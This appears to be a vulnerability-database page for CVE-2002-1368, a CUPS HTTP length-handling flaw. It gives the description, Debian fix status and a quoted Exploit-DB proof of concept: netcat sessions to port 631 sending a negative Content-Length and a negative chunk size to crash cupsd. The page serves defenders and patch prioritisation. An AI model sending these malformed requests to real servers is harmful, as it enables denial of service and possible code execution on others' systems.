CVE-2002-1368

unknown

Published — · Modified —

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

Common Unix Printing System (CUPS) 1.1.14 through 1.1.17 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code by causing negative arguments to be fed into memcpy() calls via HTTP requests with (1) a negative Content-Length value or (2) a negative length in a chunked transfer encoding.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-22106 remote linux verified text · 1 KB

iDefense · 2002-12-19

CUPS 1.1.x - Negative Length HTTP Header

text exploit Source: Exploit-DB

source: https://www.securityfocus.com/bid/6437/info

A vulnerability has been reported for CUPS that if exploited may result in a DoS or the execute of code on affected systems.

An attacker can exploit this vulnerability by connecting to a vulnerable system and issuing malformed HTTP headers with a negative value for some fields. When the cupsd service receives this request, it will crash.

This vulnerability is very similar to the issue described in BID 5033. It may be very likely that this vulnerability may be exploited to execute malicious attacker-supplied code on BSD, and possibly other, platforms.

*** January 05, 2003

There are reports of this vulnerability being actively exploited in the wild. Vulnerable users are advised to update immediately.

$ nc -v localhost 631
localhost [127.0.0.1] 631 (?) open
POST /printers HTTP/1.1
Host: localhost
Authorization: Basic AAA
Content-Length: -1

$ nc -v localhost 631
localhost [127.0.0.1] 631 (?) open
POST /printers HTTP/1.1
Host: localhost
Authorization: Basic AAA
Transfer-Encoding: chunked

- - - - -FFFFFFFE

OS impact

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`1.1.18-1`
sid	Fixed	`1.1.18-1`
forky	Fixed	`1.1.18-1`
bullseye	Fixed	`1.1.18-1`
bookworm	Fixed	`1.1.18-1`

References

https://security-tracker.debian.org/tracker/CVE-2002-1368

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.